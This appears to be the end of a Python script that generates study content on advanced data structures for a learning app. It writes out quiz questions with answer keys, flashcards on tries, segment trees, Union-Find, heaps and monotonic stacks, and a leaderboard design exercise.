    "",
    "## References",
    "",
    "### Videos",
    "- **Advanced Data Structures** by William Fiset (Google engineer):",
    "  https://www.youtube.com/playlist?list=PLDV1Zeh2NRsB6SWUrDFW2RmDotAfPbeHu",
    "- **Segment Trees** by Errichto (competitive programmer):",
    "  https://www.youtube.com/watch?v=rYBtViWXYeI",
    "",
    "### Practice",
    "- **LeetCode** — search 'segment tree', 'trie', 'union find' tags",
    "- **CSES Problem Set**: https://cses.fi/problemset/ — best structured competitive programming problems",
])

DSA_ADV_Q = [
    {"id":"dsaadv-q1","type":"mcq","prompt":"What is the time complexity for inserting a word of length L into a Trie?",
     "choices":["O(n) where n = number of words","O(L)","O(L log n)","O(1)"],
     "answerIndex":1,"explanation":"Insertion follows the string character by character, creating nodes as needed. The number of operations = length of the word = L. The number of other words in the trie has no effect.","tags":["trie","complexity"]},
    {"id":"dsaadv-q2","type":"mcq","prompt":"A Trie is used to find all words with prefix 'ca'. What algorithm traverses all matching words after reaching the 'a' node?",
     "choices":["Binary search","BFS or DFS from the 'a' node collecting all paths that reach an endOfWord node","Sorting the trie","Backtracking from root"],
     "answerIndex":1,"explanation":"After following 'c'→'a', we do a DFS from the 'a' node, building the word as we recurse. Every time we reach a node with isEnd=true, we record the current word. This is the autocomplete algorithm.","tags":["trie","search"]},
    {"id":"dsaadv-q3","type":"mcq","prompt":"Segment tree with 8 elements. A range query [2..5] processes how many nodes maximum?",
     "choices":["8 (all leaves)","4","O(log n) = ~4 nodes — segment tree splits query into at most 4 non-overlapping segments","2"],
     "answerIndex":2,"explanation":"Segment tree query: any range can be covered by at most O(4 log n) nodes because at each level, at most 4 node boundaries are crossed. In practice, range [2..5] on 8 elements requires 2-3 nodes.","tags":["segment-tree","complexity"]},
    {"id":"dsaadv-q4","type":"mcq","prompt":"In Union-Find, what does path compression do?",
     "choices":["Deletes elements from the union","After find(x) traverses to the root, it makes all visited nodes point directly to the root — future finds on these nodes are O(1)","Compresses memory usage","Sorts the union"],
     "answerIndex":1,"explanation":"Path compression flattens the tree lazily. During find(), as we walk up to root, we update each visited node's parent to point directly to root. The tree flattens over time, making amortised operations nearly O(1).","tags":["union-find","path-compression"]},
    {"id":"dsaadv-q5","type":"mcq","prompt":"You're detecting cycles in an undirected graph using Union-Find. Edge (u,v) is added. What indicates a cycle?",
     "choices":["find(u) == u","find(u) == find(v) — both nodes already in same component, so adding this edge creates a cycle","union(u,v) returns null","Rank overflow"],
     "answerIndex":1,"explanation":"If find(u) == find(v) before calling union(), u and v are already in the same connected component. Adding an edge between them creates a cycle. union() returns false in this case.","tags":["union-find","cycle-detection"]},
    {"id":"dsaadv-q6","type":"mcq","prompt":"Why use a min-heap (not max-heap) for finding the k LARGEST elements?",
     "choices":["Min-heap is faster","Min-heap of size k: peek() = smallest of the k-largest so far. New element > peek? Replace it. At end, heap contains k largest. O(n log k) vs O(n log n) sort.","Min-heap uses less memory","Max-heap doesn't support this"],
     "answerIndex":1,"explanation":"Counter-intuitive but correct. Keep a min-heap of the k largest seen so far. The root is the smallest of those k. When a new element is larger than the root, it evicts the smallest k-large (root) and joins. Final heap = k largest.","tags":["heap","top-k"]},
    {"id":"dsaadv-q7","type":"mcq","prompt":"Finding the median of a stream of numbers using two heaps. What is the invariant?",
     "choices":["Both heaps same size always","maxHeap (lower half) + minHeap (upper half). maxHeap.size() == minHeap.size() OR one more. Median = maxHeap.peek() or average of both tops.","Both heaps contain all elements","min-heap stores negatives"],
     "answerIndex":1,"explanation":"Split stream in half: lower half in maxHeap, upper half in minHeap. Maintain: maxHeap.peek() <= minHeap.peek() (max of lower <= min of upper). Median: if sizes equal, average both tops; if odd, top of larger heap.","tags":["heap","median"]},
    {"id":"dsaadv-q8","type":"mcq","prompt":"Monotonic stack: what property makes it different from a regular stack?",
     "choices":["Monotonic stack is thread-safe","Elements are maintained in sorted order (increasing or decreasing) — elements that violate the order are popped before pushing, making previous answers available in O(1)","Monotonic stacks use arrays only","No push operation"],
     "answerIndex":1,"explanation":"A monotonic stack pops elements that would violate the sorted invariant before pushing new elements. The popping step is where the answer is computed (e.g., 'x is the next greater element for all popped elements').","tags":["monotonic-stack"]},
    {"id":"dsaadv-q9","type":"mcq","prompt":"Trie vs HashMap for storing 1M strings to support prefix queries: which is better?",
     "choices":["HashMap (O(1) lookup)","Trie: prefix queries are O(L), impossible with HashMap. HashMap can check exact strings O(L average) but cannot enumerate all strings with prefix 'ab' efficiently.","Both identical","HashMap with prefix indexing"],
     "answerIndex":1,"explanation":"HashMap stores whole strings. Prefix query 'find all strings starting with ab' requires scanning all 1M strings. Trie: follow 'a'→'b', then DFS to collect all children. Trie is the only data structure with native O(L) prefix operations.","tags":["trie","hashmap","comparison"]},
    {"id":"dsaadv-q10","type":"mcq","prompt":"Segment tree: why is the array size 4*n?",
     "choices":["Wasted memory for simplicity","For n leaves, a complete binary tree needs at most 4n nodes to safely accommodate all n leaf nodes and their parents at all levels — prevents array index out of bounds","2n is always sufficient","4n is a Java constraint"],
     "answerIndex":1,"explanation":"A perfect binary tree with n leaves has 2n-1 nodes. But Nth element at depth d might be at index 2^(d+1)-1 in the array. For safety, 4n is used to avoid index overflow for non-power-of-2 input sizes.","tags":["segment-tree","implementation"]},
    {"id":"dsaadv-q11","type":"mcq","prompt":"Union-Find: union by rank means what?",
     "choices":["Sort by element value","Attach the tree with smaller rank (height upper bound) under the tree with larger rank — keeps tree height bounded at O(log n)","Union creates a linked list","Union doubles array size"],
     "answerIndex":1,"explanation":"Without union by rank, repeated unions could create a chain: 1→2→3→...→n where find(1) takes O(n). By always making smaller tree a subtree of larger tree, height stays at O(log n). Combined with path compression: O(α(n)) amortised.","tags":["union-find","union-by-rank"]},
    {"id":"dsaadv-q12","type":"mcq","prompt":"What Kruskal's MST algorithm property makes Union-Find essential?",
     "choices":["Sorting edges","Kruskal adds edges in weight order, skipping edges where both endpoints are already connected (would form cycle). Union-Find checks 'same component?' in O(α(n)) — the critical inner loop operation.","Graph BFS","Dijkstra comparison"],
     "answerIndex":1,"explanation":"Kruskal's: sort edges by weight, add edge if it connects two different components. 'Different components?' = find(u) != find(v). Then union(u,v) to merge them. Without Union-Find, cycle detection would need BFS/DFS per edge = O(E*(V+E)).","tags":["union-find","kruskal","mst"]},
    {"id":"dsaadv-q13","type":"mcq","prompt":"After inserting words ['cat','car','card'] into a Trie, how many TrieNode objects exist total?",
     "choices":["12 (3 per word × 4 chars)","6 — c,a are shared. Cat: t. Car: r. Card: r,d. Root shared. Total: root+c+a+t+r+d = 6 unique nodes","3","9"],
     "answerIndex":1,"explanation":"cat: root→c→a→t (4 nodes). car: shares root,c,a — adds r (1 node). card: shares root,c,a,r — adds d (1 node). Total: 4+1+1=6 nodes. Trie's space efficiency comes from shared prefixes.","tags":["trie","space"]},
    {"id":"dsaadv-q14","type":"mcq","prompt":"Segment tree update: changing index 3 in an 8-element array. How many nodes are updated?",
     "choices":["All 15 nodes","O(log n) = 4 nodes — only the leaf and its ancestors on the path to root","1 node only","All leaves"],
     "answerIndex":1,"explanation":"Update propagates up from leaf to root. Log2(8) = 3 levels above leaf = 4 nodes total. Each ancestor's sum is recomputed. This is why segment trees are efficient: point update touches only O(log n) nodes.","tags":["segment-tree","update"]},
    {"id":"dsaadv-q15","type":"mcq","prompt":"In the 'Next Greater Element' monotonic stack problem, what does it mean when we pop an element?",
     "choices":["The element is deleted permanently","The current new element is the answer (next greater) for the popped element — we record this before popping","Stack is full","Popping reorders stack"],
     "answerIndex":1,"explanation":"We maintain a decreasing stack. When new element x is larger than top, we pop: the popped element's 'next greater' is x. We keep popping until stack is empty or top >= x. This is the key insight: popping = answering.","tags":["monotonic-stack","algorithm"]},
    {"id":"dsaadv-q16","type":"mcq","prompt":"Largest Rectangle in Histogram: why does a monotonic stack solve it in O(n)?",
     "choices":["Stack sorts bars by height","For each bar, we need left and right boundaries where bars are shorter. Monotonic stack tracks these boundaries — when we pop a bar, the current bar is its right boundary, stack top is its left boundary. O(1) per element.","Binary search on heights","Stack stores areas"],
     "answerIndex":1,"explanation":"Classic monotonic stack application. Left boundary of bar i = previous shorter bar's index + 1 = stack top after popping. Right boundary = current shorter bar = trigger of the pop. Area = height[i] × (right-left-1). Each bar pushed/popped once = O(n).","tags":["monotonic-stack","histogram"]},
    {"id":"dsaadv-q17","type":"mcq","prompt":"What does 'Fenwick Tree (Binary Indexed Tree)' offer over Segment Tree?",
     "choices":["Faster O(1) queries","Simpler implementation (array + single BIT operation), same O(log n) for point update and prefix sum query, half the memory of segment tree. Trade-off: less flexible (prefix sums only, harder to extend to range min/max).","Fenwick is slower","Fenwick handles strings"],
     "answerIndex":1,"explanation":"BIT is simpler to code (10 lines vs 50+). Same asymptotic complexity for prefix sum queries. Half memory. But segment tree is more general: supports range queries for any associative operation, range updates with lazy propagation.","tags":["fenwick-tree","segment-tree","comparison"]},
    {"id":"dsaadv-q18","type":"mcq","prompt":"Union-Find with N=10^6 nodes, performing 10^6 union and find operations. Practical time complexity?",
     "choices":["O(N²)","O(N × log N)","O(N × α(N)) ≈ O(N) — α(N) is the inverse Ackermann function, never exceeds 5 for any practical N","O(N × sqrt(N))"],
     "answerIndex":2,"explanation":"α(N) (inverse Ackermann) grows so slowly it's effectively constant. For N = 10^80 (atoms in observable universe), α(N) = 5. For practical purposes: Union-Find with both optimisations is O(1) per operation.","tags":["union-find","complexity"]},
    {"id":"dsaadv-q19","type":"mcq","prompt":"You need to find the k-th smallest element in a matrix where each row and column is sorted. Best approach?",
     "choices":["Sort all elements O(n² log n)","Min-heap of (value, row, col) starting with first column elements. Poll k times, push next element in same row each time. O(k log n) where n is matrix dimension.","Binary search on value + count","Linear scan"],
     "answerIndex":1,"explanation":"Each matrix row is sorted. Min-heap starts with (matrix[i][0], i, 0) for all rows. Poll min: if col+1 exists, push (matrix[i][col+1], i, col+1). After k polls = k-th smallest. Uses sorted structure to avoid processing all n² elements.","tags":["heap","matrix","top-k"]},
    {"id":"dsaadv-q20","type":"mcq","prompt":"What is the space complexity of a Trie storing N words of average length L?",
     "choices":["O(N × L) worst case (no shared prefixes)","O(N) total","O(L)","O(N/L)"],
     "answerIndex":0,"explanation":"Worst case: all words share no prefixes (completely different first characters). Each word needs L nodes. N words × L nodes = O(NL). Best case (all words share most of the path): much better. Dictionary words often share prefixes, giving good practical compression.","tags":["trie","space-complexity"]},
]

DSA_ADV_FC = [
    {"id":"dsaadv-fc1","front":"When to use Trie over HashMap","back":"Use Trie when you need prefix operations: autocomplete, 'all words starting with X', longest prefix match. HashMap is O(1) but can't enumerate by prefix. Trie: O(L) per operation, L = word length.","tags":["trie"]},
    {"id":"dsaadv-fc2","front":"Segment Tree — query + update","back":"Both O(log n). Build: O(n). Space: 4n array. Use for range sum/min/max with point updates. When range is exact node: return directly. When no overlap: return 0/INF. When partial: recurse both children.","tags":["segment-tree"]},
    {"id":"dsaadv-fc3","front":"Union-Find operations","back":"find(x): returns root of x's group (with path compression). union(x,y): merge groups of x and y (by rank). Returns false if already same group (= cycle). O(α(n)) ≈ O(1) with both optimisations.","tags":["union-find"]},
    {"id":"dsaadv-fc4","front":"Top-K pattern","back":"k largest: maintain min-heap of size k. For each element: if heap.size() < k OR element > heap.peek(): replace. O(n log k). k smallest: max-heap same logic. Java: PriorityQueue (min) or new PriorityQueue(Comparator.reverseOrder()) (max).","tags":["heap","top-k"]},
    {"id":"dsaadv-fc5","front":"Median from stream","back":"Two heaps: maxHeap (lower half) + minHeap (upper half). Balance: sizes differ by at most 1. maxHeap.peek() <= minHeap.peek(). Median: even size = average of both tops. Odd = top of larger heap. O(log n) insert, O(1) query.","tags":["heap","median"]},
    {"id":"dsaadv-fc6","front":"Monotonic stack — when to use","back":"Use when you need 'next/previous greater/smaller element'. Decreasing stack for next greater. Increasing stack for next smaller. O(n) total — each element pushed and popped at most once. Problems: stock span, histogram, rain water.","tags":["monotonic-stack"]},
    {"id":"dsaadv-fc7","front":"Union-Find cycle detection","back":"Before union(u,v): if find(u) == find(v) → cycle! They're already connected. Used in Kruskal's MST: skip edge if endpoints are in same component. Also: number of connected components = number of distinct roots.","tags":["union-find","cycle-detection"]},
    {"id":"dsaadv-fc8","front":"Segment Tree vs BIT (Fenwick)","back":"Segment Tree: general (any associative op: sum, min, max), range updates, lazy propagation. Fenwick Tree: prefix sums only, simpler code, half memory. For competitive programming: learn both. For interviews: know segment tree.","tags":["segment-tree","fenwick"]},
]

DSA_ADV_PROJ = {
    "brief": "Design a real-time leaderboard for a game with 1 million players. Features: update a player's score, get player's rank, get top-100 players, get players in rank range [50..100]. Design the data structure and algorithm for each operation. What are the time and space complexities?",
    "checklist": [
        {"id":"ds1","text":"Score update: O(log n) using balanced BST or segment tree indexed by score range","weight":20},
        {"id":"ds2","text":"Top-100 query: O(100 log n) with heap or O(log n + 100) with segment tree","weight":20},
        {"id":"ds3","text":"Player rank lookup: O(log n) with order-statistic tree or segment tree with counts","weight":20},
        {"id":"ds4","text":"Redis sorted set real-world option: ZADD O(log n), ZREVRANK O(log n), ZREVRANGE O(log n + k)","weight":20},
        {"id":"ds5","text":"Space trade-offs discussed: segment tree on score range vs tree on player array","weight":20},
    ],
    "hints": [
        "Redis Sorted Set is the real-world answer: ZADD gameLeaderboard <score> <playerId>. ZREVRANK for rank. ZRANGE for range.",
        "Segment tree: build over score range [0..10^9] with coordinate compression. Each leaf = count of players at that score.",
        "Order-statistic tree (Java TreeMap won't work natively — you'd need a custom AVL/Red-Black that tracks subtree sizes).",
    ]
}

write("security", "data-structures-advanced.json", {
    "id": "data-structures-advanced",
    "unit": 11,
    "order": 112,
    "title": "Advanced Data Structures",
    "summary": "Tries, segment trees, Union-Find, monotonic stacks, and heap tricks for competitive programming and system design.",
    "prereqs": ["dsa-java-trees", "dsa-java-heaps"],
    "guide": DSA_ADV_GUIDE,
    "questions": DSA_ADV_Q,
    "flashcards": DSA_ADV_FC,
    "project": DSA_ADV_PROJ,
})

print("\n=== Batch 1 Complete ===")
print("Topics written to src/content/topics/security/")
print("  - security-fundamentals.json")
print("  - system-design-fundamentals.json")
print("  - data-structures-advanced.json")

